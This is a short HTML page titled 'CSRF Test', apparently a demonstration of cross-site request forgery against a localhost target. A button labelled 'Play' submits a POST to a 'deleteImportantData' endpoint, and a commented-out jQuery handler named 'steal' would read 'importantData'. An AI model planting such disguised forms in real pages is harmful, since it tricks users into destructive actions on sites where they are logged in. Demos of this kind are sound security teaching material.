<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>CSRF Test</title>

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</head>

<body>

  <form action="http://localhost/deleteImportantData" method="post">
    <button type="submit">Play</button>
  </form>


  <script type="text/javascript">
    $(document).ready(function () {
      $("#steal").click(function () {
        // $.get("http://localhost/importantData", function (data) {
        //   $("#stolen-data").html(data);
        // });
      });
    });
  </script>

</body>

</html>